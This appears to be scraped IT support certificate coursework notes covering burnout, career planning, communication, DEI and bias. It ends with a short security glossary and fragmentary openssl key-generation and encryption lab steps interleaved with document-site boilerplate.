burnout that appear:
 Constantly exhausted
 Physical pain such as migraines, headaches, muscle aches and pains, and
 Changes in appetite
 No longer interested or have enough energy to engage in activities outside of work
 Changes in your sleep. If you notice you are suddenly sleeping way more or way less
than usual, it might be a symptom of burnout.
Identifying burnout triggers
It’s equally important to take time to reflect what is contributing to your burnout symptoms
and experiences. A lack of agency is one of the root causes of burnout. A lack of agency occurs
when you feel like you’re not in control of your current situation and have no opportunity to
either progress in your career at your company, financial restrictions, feeling that there’s not
enough time to get things done, or lack of recognition in the workplace. Not getting enough
rest or sleep also contributes a lot to burnout. When we don’t get enough sleep, we are not as
productive, have troubles focusing, and lower pain tolerance. Do you feel like you are in a
constructive community? Feeling like you’re alone in the workplace can lead to burnout. If
you’re working at a job that doesn’t give you a sense of purpose, it might be time to
reconsider your options. Completing tasks that are not fulfilling to you or utilizing all your
skills impact the quality of your work and can lead to burnout.
Repairing causes of burnout
One of the main ways to decrease symptoms of burnout is to reframe your thoughts around
the current situation.It’s always beneficial too to reach out for help from Human Resources,
your supervisors, or other colleagues. For example, if you feel like your work has no sense of
purpose, notify your supervisor and ask if there are other tasks or positions within your
organization that allow you to work on projects and teams that give you a sense of fulfillment
and purpose. Resetting expectations additionally greatly helps with repairing burnout. Take
inventory of what the contract deliverables are for your current position, assess whether you
are meeting those deliverables, and then take note of your own expectations of the position
up until that moment in time.
Sustainable workplaces
Working for a company that grants its employees schedule flexibility, mental health
resources, and manageable workloads can bring a peace of mind and help your career in the
long run by supporting your health and well-being. Flexible schedules allow for employees to
attend life events such as medical appointments, family matters, and related matters at times
that work best for the employee. Some companies will support mental health days and allow
you to take paid time off (PTO) to rest, recover, and recharge.
Create a Career Development Plan

Creating a Career Development Plan
There are several components and aspects of your potential career to consider while you are
job searching. Before embarking on your journey, it is important to outline your career path.
Doing so will help you find opportunities that align with your values, interests, and
aspirations. As an IT support professional, you have a myriad of options available to you.
Every industry is hiring IT professionals to assist with troubleshooting issues, recommending
solutions, providing quality customer service, and to serve sometimes as the subject matter
expert for the company’s technological resources.
Identifying career goals
What do you want to accomplish as an IT professional? There are multiple specialist fields in
the industry that will give you the opportunity to further develop and hone your skills in
specific areas. However, you can just as easily take the generalist route and cross-apply your
knowledge of technology and tech support to various roles. What type of work environment
do you want to work in? Some companies provide lots of in-office perks such as a
comprehensive kitchen with free snacks, unlimited PTO, and team-building community
events. Other workplaces include flexible work schedules and options that allow you to work
from home, in the office, or a hybrid. Having a general idea of what you’re looking for in a
work environment will help you narrow down your job search and land opportunities that are
a better fit for you. Additionally, do you aspire to eventually work in management in any
capacity? If so, it’s important during your job hunt to ask about opportunities for
advancement or transition throughout the company. Some companies are limited in
opportunities due to long-term employee retention or other factors.
What are your unique strengths and skills that you bring with you to a company? Identifying
your strengths, both soft and hard skills, will help you stand out from other applicants. There
are a plethora of transferable skills that you can use to leverage your application. If you’re not
sure where to start on identifying your unique strengths and identifying your transferable
skills, there are lots of online resources and platforms to help you get an idea. Skill stacking is
becoming more appealing to hiring managers and companies within the field of technology.
Skill stacking is when employees combine skills from different fields or industries to produce
novel ideas, approaches, and systems. Soft skills are the most important skills to have if
you’re considering any position in management or if you want to work in a team-based work
environment. Having the skills to hold conversations, navigate conflict, and collaborate with
others will highly benefit your career.
Creating a timeline
A common question that is asked in interviews is the “where do you see yourself in x amount
of years?” Creating a timeline for you and your career is helpful in gaining insight into what
career opportunities will work best for you moving forward. One helpful way to gain clarity
into this is to break down your bigger career goals into smaller goals.
Approach your job search and career in IT with an open mind. Be flexible with deadlines,
milestones, and your own personal timeline. Be receptive to potential job opportunities that
you might not traditionally apply to or pursue. Adaptability and flexibility are two of the most
coveted soft skills employers look for in their employees. Lastly, hold yourself accountable for
your own progress. Technology is always changing and staying informed of all the changes
that pertain to your job or specialty will give you an advantage over other employees. Look at
taking other certifications, take online courses, read books on the subject, attend
conferences, continuously network with other professionals in your field, and/or complete
passion projects in your free time. Taking extra measures to inform yourself about your field
and attending events with other professionals will greatly increase your chances of success
and career satisfaction.
etting Promoted
As you are starting to look for an entry level job in IT support, consider why you should start
thinking about a promotion.
There are two main reasons to start job planning for a promotion: 1) Since you are prepared
and committed to do your best from day 1, you will give an amazing first impression and
probably get noticed from the beginning; 2) Knowing where you want to be in 5 to 10 years
will help you successfully plan for your growing career. You know that you have the tools to
successfully start your career as an IT support professional. Now is the time to plan for what
to do next, with special consideration as to what IT path to continue. Perhaps you're
interested in furthering your knowledge in networking, help desk support, or cyber security.
What are the growth opportunities in your organization? Do they support training? Is this a
transitional job? Is this your dream job? All these questions must be taken into account when
planning your next steps.
After you answer those basic questions, you have to prepare and space your next steps
accordingly. If you are planning to grow within your organization, there are a few
considerations that you want to evaluate to get to the place where you want to be.
The first thing to consider when planning for a promotion is performing beyond average at
your current position. This means proving to your employer that you are not only capable of
doing your actual job, but that you are capable of taking on bigger responsibilities. Now, the
question is, how to achieve that?
 Work on your development. There are two groups of workers: the ones doing the same
job every year and excelling at it, and the ones excelling at the same job while adding
value to it. To get a chance at that promotion, you need to be in the second group. The
employee that gives more every day, willing to take new responsibilities.
 Show leadership and be a team player. Showing that you are a team player and can
take leadership roles will help you to get noticed by your employers. Strive to be a role
model, gain your coworkers respect, and motivate your team members. In other
words, display and build qualities that will make you a good leader.
 Continue your education. When developing your career path, consider and plan for
future certifications and training. For example, if you are planning to get from IT
support to network administration, plan to take a few new certifications like
Network+, Cisco professional certifications, and so on. Check for the company
network administration job requirements and improve your skills accordingly.
 Maintain strong work ethics. Always be punctual for work, have excellent customer
service, meet your deadlines, excel at your job, be respectful, and collaborate with
your coworkers.
 Communicate with your boss, your coworkers, and your customers. Good
communication is a key characteristic to display in any type of job, but when you are
looking for a promotion, you need to excel in the way you communicate. It is crucial to
know how to communicate. It will help when planning for your career path and add
some communication training to your skill development.
Key takeaways
Planning for a promotion doesn't necessarily mean that you are going to get one. Sometimes
you will need to ask for it, or change roles or organization in order to have it. But it means that
you will be ready and will be able to daily demonstrate your value as part of the organization.
Related Technical Careers
The Google IT Support Certifications are part of a bigger project called Grow with Google
(GWG).
GWG offers some other certifications that can help you grow even more and pursue advanced
job opportunities.
The offered career certificates are:
Google IT Automation with Python Certificate
This program takes your IT foundations to the next level, teaching you how to program with
Python and how to automate common system administration tasks using it.
A total of 6 courses, you will learn:
 Crash course on Python

 Using Python to interact with the operating system
 Introduction to Git and GitHub
 Troubleshooting and Debugging Techniques
 Configuration Management and the Cloud
 Automating Real-World Tasks with Python
To learn more about this certification visit:
Google IT Certificates
Google IT Automation with Python Professional Certificate
Google UX Design Certificate
Learn the foundations of user experience (UX) design with this certification, which will
prepare you to enter a fast growing career field. In its 7 courses, through this certification you
will learn:
 Developing personas, user stories, and user journey maps

 Conducting usability studies
 Creating wireframes and prototypes
 Testing and iterating on designs
 Building a professional portfolio
UX Design Certificate
Google UX Design Professional Certificate

Google Project Management Certificate
Take your first steps into the field of project management with this professional certificate
developed by Google. Learn about:
 Estimating time and budgets

 Running effective meetings and managing stakeholders
 Identifying and managing risks
 Applying Agile and Scrum frameworks
 Leadership skills and navigating team dynamics
Project Management Certificate
Google Project Management: Professional Certificate
You can also grow your career by taking any of these Google Cloud professional certifications:
Cloud Network Engineer Professional Certificate
Networking in Google Cloud Specialization
Security in Google Cloud Specialization
Social Emotional Skills

Social Emotional Skills
More employers are seeking candidates who bring a combination of social skills and
emotional intelligence skills in addition to the traditional technical skills. Providing quality
customer service, being a good communicator, and developing positive relationships with
coworkers help employees stand out. Possessing good social and emotional skills will help
leverage all your relationships from personal to professional.
Prioritizing your workload is a critical skill that will save you a lot of time, stress, and can help
you prevent burnout in the long haul. There are multiple tools, apps, and online resources
that can assist with time management, to-do’s, and tasks. Find a method or approach that
works for you. There is no one solution that works for everyone, stay curious about different
approaches to your organization and time management strategy. Break your big projects and
tasks into smaller tasks to make it more manageable and more rewarding. Focus on what
outcomes you want to achieve by completing a specific task or goal.
Procrastination is a major hindrance to productivity and work satisfaction. While it is normal

to experience a little bit of procrastination, it is detrimental if it means you are completing the
majority of your work very close to proposed deadlines, working overtime, experiencing
troubles with focus, or work on the weekends to make up for lost hours of productivity due to
procrastination. Identify things that distract you from your work and reflect back on times
when you did procrastinate. What were some common items, events, or settings that
distracted you from focusing on your work? Our work environment has a big influence on our
focus and productivity. Workplaces that have a lot of decorations, pictures, pets looking for
our attention, loud music playing in the room, or working in a busy cafe are some examples of
environments that can distract us. Notice what settings you feel the most productive in and
aspire to create a work environment that emulates that. Everyone is different, approach this
exploration with an open mind and make it work for you.
Confidence is at the cornerstone of success. It’s a critical skill that will help you be seen as a
leader within your workplace and eventually lead to more opportunities for advancement or
raises. Having confidence additionally helps you provide better quality customer service to
clients while working in the field of IT support. Building positive relationships with clients will
ensure they return to you for technical support, and your confidence will guide them to
trusting your expertise to a greater degree than a professional with not as much confidence.
Regulating emotions also goes a long way in career success.
Practicing empathy with coworkers and clients further develops a positive relationship with
them. Everyone loves to feel like they’re understood and supported in their endeavors. It’s
equally important that you take time to practice self-compassion and self-forgiveness. If you
ever feel overwhelmed by the amount of tasks you have to complete or don’t understand the
nature of your assignment, always reach out to your colleagues and supervisors for
assistance. You are not in it alone and everyone in the IT field has been a novice at some point
in their career. Reach out to your team to gain clarification on the expectations for your role,
brainstorm ideas about making your work more efficient, or revising your workload if you are
assigned more than what you’re able to complete without burnout.
Diversity, Inclusion, and Bias

Diversity and Inclusion
In the simplest terms, diversity means something that is different from the norm. Diversity in the workplace
represents how organizations and their employees connect, engage, and respect people across all types of
differences. More companies are beginning to emphasize their Diversity, Equity, and Inclusion (DEI) metrics
as a way to stand out from their competitors. Companies with good DEI metrics tend to have higher
employee retention rates, more satisfied employees, and increased innovation.
Diversity starts at the very top with a company’s executive leadership. Examine the leadership at the
company you want to work for. The people working at the executive level is typically a good indicator of
how diverse and well-represented their employees are as well. If a company’s executive leadership does
not embrace diversity, the employees will experience greater difficulties in creating and maintaining that
culture. Some questions to ask yourself as you are conducting research on companies:
 Does the company share their progress openly?

 Do they provide education and training opportunities to learn more about DEI and how people in
the workplace are impacted?
There are several ways to assess whether or not a company practices diversity and inclusion. Here are a
few resources to explore and gain better insights on the company:
 The company’s website. Assess their core values, history, mission statement, and keywords. See if
their website includes any photographs of their employees.
 Their social media page(s). What kind of pictures and content do they post publicly? Check for
photos of their employees, community outings, whether or not they recognize or celebrate various
events or historical moments such as pride month, black history month, or world mental health
day as a couple examples.
 Interview former employees. Conduct informational interviews to learn more about a company in
general and ensure that workplace culture will be a good fit for you.
Unconscious/Implicit Bias
Unconscious or implicit bias refers to the attitudes, stereotypes, judgements, or prejudices that we have
unconsciously in our brain. This bias makes our reactions, thinking, and predisposition to information,
actions, or environments alter in a particular way, whether it be positive or negative, without self
awareness of its occurrence. It occurs beyond our control and could impact our decisions, actions, and
understanding.
Unconscious bias is present, to some degree, in every single person and is developed from an early age
through the course of one's life. Unconscious bias is associated with many characteristics such as race,
ethnicity, gender, religion, sexual orientation, socioeconomic background, and educational background.
Some of the common types of unconscious bias are:
 Affinity bias, which refers to preferences when choosing people to connect with. These people
share similar interests, experiences, and backgrounds to your own.
 Attribution bias, which refers to the ways you perceive your actions in comparison to others. This
bias is mostly in association with how you perceive success and failure.
 Ageism, which refers to negative feelings or discriminations against someone based on their age.
 Beauty bias, which refers to relating a person's physical appearance to their success, competence,
and/or qualifications.
 Gender bias, which refers to a preference for one gender over others.
 Ableism bias, which refers to perceiving able-bodied people as the norm and people with
disabilities should strive to perform at the same level as able bodied people without necessary
accommodations. (examples: reserving a meeting space that is not wheelchair accessible,
assuming people have to have a visible disability to be considered disabled, framing disability as
something tragic or as an inspiration)
In order to identify our own biases, it’s important to know what are some of the causes of
unconscious/implicit bias. Bias occurs because, as human beings, we are susceptible to tendencies and are
creatures of habit. For example: humans tend to seek patterns, our brains are known to simplify the world,
we get influenced by culture and/or media.
The truth is that no matter what the causes are, we are susceptible to implicit bias, and this could affect
our relationships at work, the way we behave on certain occasions, the decisions we make, and how we
react in our work environment.
The first step that we can take to remediate this behavior is to recognize that we are susceptible to bias
and to identify it. The next step is to take actions that reduce the implicit bias at work. Some corrective
measures that can be taken are:
 Increasing education. Educating employers and employees about the different types of
unconscious bias and how to recognize it is one of the most effective methods to reduce this bias
at work.
 Creating an inclusive work environment. Having an inclusive work environment will help to
broaden perspectives and balance any prejudices.
 Taking into account the types of bias when making decisions. Check your decision for any cultural,
racial, ability, or gender stereotypes.
Key Takeaways
 We are all human, each with our own thoughts and opinions. It is important to recognize we do not
all think the same way.
 Unconscious/Implicit Bias is an unavoidable result of being human and can influence daily
decisions in our personal and professional lives.
 Make sure to be conscientious about unconscious/implicit bias when in the workplace by being
open minded.
 A culture of diversity, equity and inclusion starts with executive leadership in any organization.
 Continuous education and training is very important and effective for reducing bias at work and
promoting a culture of diversity, equity, and inclusion.
Advanced Communication Skills

Advanced Communication Skills
Interpersonal Communication
In your IT career, you will need to use interpersonal communication every day. You will need to speak with
other people in the company, including employees, managers, and different people outside the company
such as vendors. You may manage a team at some point in your career. This reading will help you build the
interpersonal communication skills you can use for everyday communications.
Interpersonal Communication Types
 Verbal Communication - This is spoken communication. You use this when you speak to others at
the workplace, on the phone, or at virtual meetings.
 Listening - Listening is more than hearing what people say. Listening is focusing on what they are
saying, and receiving their messages.
 Written communication - Letters, emails, text messages, emojis, and GIFs are all different types of
written communication.
 Nonverbal communication - Gestures, body language, eye contact, facial expressions, and touch
are all examples of nonverbal communication.
Some ways to improve interpersonal communication:
For a team or an organization to work well, members need to be able to say what they need others to know
and to fully understand what others need from them. Here are some tips to help with interpersonal
communication:
 Be consistent with communication - Set communication standards and keep them.

 Focus on workplace communication at work. Personal communication is unprofessional and takes
away time you need for work.
 Avoid assumptions - listen to what the other person says and respond to what the other person is
saying. Making assumptions will stop their full message from reaching you.
 Listen actively - carefully listen to what the other person says and fully understand it before you
respond. Responding without knowing the message leads to misunderstanding, and it could lead
to conflict.
Making Requests
Members of a team or organization sometimes need to make requests of each other. Effective requests are
more likely to get results, and they show team or organization members they can rely on each other. When
making requests:
 Be sure to know what you are requesting before you make the request
 Be clear when you make a request - it’s important to communicate exactly what you need from the
other person.
 You may need to wait for the right opportunity to make the request if the other person is busy.
 Listen carefully to what the other person has to say with an open mind after you make the request
if the person denies it.
 Always make requests politely and respectfully.
When to use which type of communication
Some communications are done verbally in the workplace or in a virtual meeting. Others are done through
phone calls. Some are done through email, messaging, or on paper. Not all communications use written or
spoken language. Some communication is nonverbal. Each situation calls for one or more types of
communication.
In situations where information has to be given to the whole team, you should share it at the workplace in
a meeting or in a virtual meeting using verbal communication.These situations include:
 Announcements the whole team needs to hear

 Ideas and requests for the team
 Requests for individuals that are not personal such as asking a team member to perform a task for
the team
 Discussion points that need to be discussed by the team
A second part of this communication is a group email sent to the team with a recap of the information
from the meeting. This will give team members ongoing access to the information, and it will provide the
information for any team members who couldn’t attend the meeting.
Use group emails to the team when you have something important to share between meetings. Use text
messages when you have short messages for other individuals. You can use personal emails for longer
communications.
For communications after hours, or for private conversations between two people, you can have a phone
conversation. You can meet the individual in a private office, but private conversations include sensitive
information, so be sure to respect the other person’s privacy and have the conversation in a way no one
else can hear it or join in. Here are some examples of private conversations:
 Criticism - Use criticism to help someone else solve a problem, not to hurt them. If you criticize
them in front of the team, it will embarrass them, and it can lead to gossip and conflicts.
 Personal situations - Someone may come to you with personal information.Treat this as a private
communication. If the person wants the team to know, they will share it themselves.
Nonverbal communication is important. It helps get the message across without words. It can cause
problems when the wrong message comes through. When having interpersonal communications at work,
try to be careful to avoid too much emotion. Here are some examples of nonverbal cues:
 Facial expressions - Example: A person says they’re happy, but they have a sad facial expression.
People who experience the expression know the person is sad.
 Tone of voice - Tone of voice can say more than the words said. For example, when someone says
“good job” in an angry tone, it probably means the speaker isn’t happy about what the other
person did.
 Eye contact - looking directly at the speaker demonstrates to them that you are listening and
interested in what they have to say.
 Actions - Hand movements and other body movements are also communication. If you slam your
fist on a table but say you are not angry, people will still know you are angry.
Leadership and Interpersonal Communication
During your IT Support Specialist career, you may lead a team or have a supervisory role. Communication
skills are essential for a leadership position. You need to be able to communicate:
Expectations - be sure to set realistic expectations, and to clearly communicate them to your staff
members. Make sure they understand them and encourage questions if there is something they
don’t fully understand.
 Asking questions - Asking the right questions is important. Be sure you know exactly what
information you need before asking questions.
o Examine the problem or situation and decide what you need to know.
o Ask your question in a tone that demonstrates to the other person that you are interested
in the answer. If you ask in an over formal or accusing tone, the other person will feel
anxious, and they may not answer fully.
o Ask your questions clearly, and focus them on what you need to know. If the questions
aren’t clear, or if they aren’t focused on what you need to know, the answers will also be
unclear.
o Actively listen to the answer after you ask the question. You need to fully understand what
the other person is saying before you react to the information or use it.
o After you get the information you need, thank the person who gave you the information. It
shows the other person respect, and they will be more likely to answer questions in the
future.
Communication for Introverts
If you are an introvert, your communication experiences may be different than what extroverts experience.
Here are some tips for communication for introverts:
 Think about what you want to know, and ask open ended questions. That will let the other person
give you full answers and take on much of the conversation.
 Use quick greetings and responses to others’ greetings. If someone says, “good morning” to you,
say the same. You can acknowledge the greeting without starting a conversation.
 Prepare for meetings and team or organizational functions. Think about what you are going to say,
and have answers ready for questions you may be asked. If someone asks a question you don’t
have an answer prepared for, ask if you can take a little time to think about it.
Cross-Cultural Communication
You will be working with many different people from different cultures and in different time zones all over
the world. Cross-cultural communication will help you understand the similarities and differences among
different cultural groups and engage with different people from different cultures. For people to work
together in teams and organizations, they need to understand each other well across cultures.
Working with people from other cultures
Your teams and organizations will have members from all over the world. There will be cultural differences
between you and them. Some things you do will be different from how they do them. Since you are
working with them, you need to understand each other to work together efficiently. Here are some ways to
improve your cross-cultural communications:
 Research and study the cultures of people you work with. Find out what types of gestures and
actions they use for communication. Find out if there are any gestures you use that are offensive to
them and avoid those gestures. Find out which gestures they understand and try to use those.
 Don’t use slang when having cross-cultural communications. Your slang comes from your culture
and other cultures may not understand what it means. In some cases slang from your culture may
offend people from other cultures.
 Be careful with humor. Different cultures have different understandings of humor. What is funny in
your culture might not be funny in other cultures. People from those cultures may be confused.
Sometimes humor that’s funny in one culture is offensive in others.
 Speak slower if someone asks you to, but don’t speak too slow or it may offend the other person.
Problems with cross cultural communication
Problems happen with cross-cultural communication, but if you know what causes them, you can avoid
them. Here are some of the problems that can happen:
 Gesture problems - Simple gestures in one culture can mean something different in another. You
may use a gesture that’s positive in your culture, but is offensive to the person you are
communicating with from another culture. In the same way, another culture’s positive gesture
may be offensive to you.
 Stereotyping - Stereotyping is offensive, and it gives you the wrong ideas about cultures.
Sometimes well-meaning people mistake stereotypes for knowledge of a culture and use them to
communicate with members of that culture.
 Misunderstood humor - Most cultures have some form of humor and jokes. People from other
cultures might be confused by your joke, or, in some cases, jokes that are funny to you might
offend people from other cultures.
 Differences in messaging - You might send an email and find it either doesn’t get a response, or the
response is slow. Some cultures treat email and other communications differently. You might
come from a culture where individuals answer emails right away, but the culture you sent the
email to doesn’t respond until their whole team looks at the email.
 Time zone problems - The world has 24 time zones, one for each hour. You need to check where
the people you are communicating with are and what time zones they’re in. Problems happen
when someone in one time zone calls out at a regular time like 9:00 in the morning, but the person
on the other end of the communication has to wake up at 3:00 in the morning to take the
communication. The receiver sees this as inconsiderate and it can lead to conflict and lost
opportunities.
Managing Conflict
When people work together, there will be some miscommunications. Problems with interpersonal
communications, cross-cultural communications and clashing thoughts and ideas create conflict. Conflict
can make your team inefficient since members have a difficult time working together. Being able to
manage conflict will keep conflict from harming productivity and help your team work together toward
goals even if they disagree with each other.
Why does conflict happen?
Conflict happens for many reasons. Here are a few of the situations that cause conflict:
 Personality conflict - Every person is different, and each person has their own personality.
Sometimes these personalities clash.
 Work environment problems - Having a negative work environment leads to conflict. It’s important
to keep a safe, comfortable work environment to prevent conflict.
 Interpersonal communication problems - Misunderstandings and negative responses to criticism
cause conflict.
 Cross-cultural communication problems - Cultural misunderstandings and assumptions may
create conflicts.
How do I solve conflict?
Conflict is natural when people work together. People have different ideas and disagree. Once conflict
happens, you need to solve the conflict before it becomes worse.
 Address issues as soon as you see them. Meet with the team members involved with the conflict
and listen to what each of them has to say. Give each of them a chance to share their side of the
conflict.
 Be clear about what each side needs and address the situation. Once you know what each side
needs and you heard both sides’ information about the conflict, find a resolution that will stop
further conflict.
 Prevent conflict by keeping a safe, pleasant work environment. Keep the environment positive.
Encourage open, friendly communication between team members. If there are minor
disagreements, let them share them in an open, positive environment and put them aside before
they create bigger problems.
 Encourage team members to share their ideas and cultures with the rest of the team often to
promote cultural understanding and prevent cross-cultural communication problems.
What if I’m in the middle of the conflict?
As an IT professional, you will face conflict at times in your career. Conflict will happen, and dealing with it
well will stop it from getting in the way of your work. Handling conflict and interruptions is important for
success in your field. Here are some times you may be faced with conflict:
 Critical feedback - How you take criticism can lead to knowledge or conflict. When you receive
criticism:
o Listen actively to what the other person is saying. Figure out the point they are telling you.
Is it constructive criticism? If it is, thank them and learn from it. Work on improving what
they criticized you about.
o If the criticism is empty criticism or hostile criticism, don’t fight back. If the person keeps
doing it, report the hostile behavior to your supervisor. If you fight back, it will end in
conflict.
 Interruptions - Sometimes someone will interrupt you while you are speaking. When you deal with
an interrupter:
o Find a time to talk to the interruptor in private and tell them you are upset about the
interruptions. Say something like, “Please let me finish my sentences when I speak. I
would be happy to answer any questions or discuss any points after I finish speaking”.
o When they interrupt you at a meeting or in a conversation, calmly ask them to let you
finish your sentence. If you react with hostility, your reaction will create conflict.
Key takeaways
 Having good interpersonal communication skills will help you throughout your career as a team
member and as a leader. Knowing which type of communication to use helps you get messages
across in specific situations.
 You will be working with people from all over the world in your career. Having cross-cultural
communication skills will help you understand them and show respect for their cultures. It will
also help you teach them about your culture and prevent misunderstandings.
 Managing conflict is important when you are dealing with a team or organization and other team
members. Always listen with an open mind to all sides of the conflict.
 When someone criticizes you, responding with hostility will create conflict. If the criticism is
constructive, learn from it.
 A safe, comfortable workplace helps prevent conflict.
 Instead of responding to an interrupter with hostility, calmly ask them to let you finish your
sentence.

It Professional Security Support Module 1 Glossary: New Terms and Their Definitions: Course 5 Week 1

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

It Professional Security Support Module 1 Glossary: New Terms and Their Definitions: Course 5 Week 1

Uploaded by

Copyright:

Available Formats

IT PROFESSIONAL SECURITY SUPPORT

Attack: An actual attempt at causing harm to a system

Botnet: A collection of one or more Bots

Confidentiality: Keeping things hidden

Exploit: Software that is used to take advantage of a security bug or vulnerability

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods

Integrity: Means keeping our data accurate and untampered with

Logic bomb: A type of Malware that's intentionally installed

Session hijacking (cookie hijacking): A common meddler in the middle attack

Spoofing: When a source is masquerading around as something else

Spyware: The type of malware that's meant to spy on you

SYN flood: The server is bombarded with SYN packets

Threat: The possibility of danger that could exploit a vulnerability

Viruses: The best known type of malware

Start the lab

Generating a private key

openssl genrsa -out private_key.pem 2048

Generating RSA private key, 2048 bit long modulus (2 primes)

-----BEGIN RSA PRIVATE KEY-----

Click Check my progress to verify the objective.

Generate private key

Generating a public key

openssl rsa -in private_key.pem -outform PEM -pubout -out public_key.pem

writing RSA key

-----BEGIN PUBLIC KEY-----

Click Check my progress to verify the objective.

Generate public key

Encrypting and decrypting

openssl rsautl -encrypt -pubin -inkey public_key.pem -in secret.txt -out

^? < e ^@vmD ^B% r*M o^R ^O 8 X { ^\(^B ^}= 1i T 9~ ^RT^\^Px ^T^l

openssl rsautl -decrypt -inkey private_key.pem -in secret.enc

This is a secret message, for authorized parties only

Encrypting and decrypting

Creating a hash digest

To create a hash digest of the message, enter this command:

openssl dgst -sha256 -sign private_key.pem -out secret.txt.sha256

openssl dgst -sha256 -verify public_key.pem -signature secret.txt.sha256

Click Check my progress to verify the objective.

Sign and verify

End your lab

The number of stars indicates the following:

 1 star = Very dissatisfied

Start the lab

Physical Privacy and Security Components

CIA Principle: Confidentiality

Preventing unauthorized access to an organization’s data and networks is imperative in protecting a

In a previous video, you learned about three types of authentication methods:

 Something you know - password or pin number

 Somewhere you are - geofencing, GPS, Indoor Positioning Systems (IPS)

Something you are: Biometrics

Iris and Retinal scanning

Somewhere you are: Geolocation

Global Positioning Systems (GPS)

Indoor Positioning Systems (IPS)

Near-field communication (NFC) and scanners

Something you do: Gestures and Behaviors

1. Something you know - password or pin number

Resources for more information

Supplemental Reading for Authentication

RADIUS or remote authentication dial in user service is

Kerberos, is a network authentication protocol that uses tickets to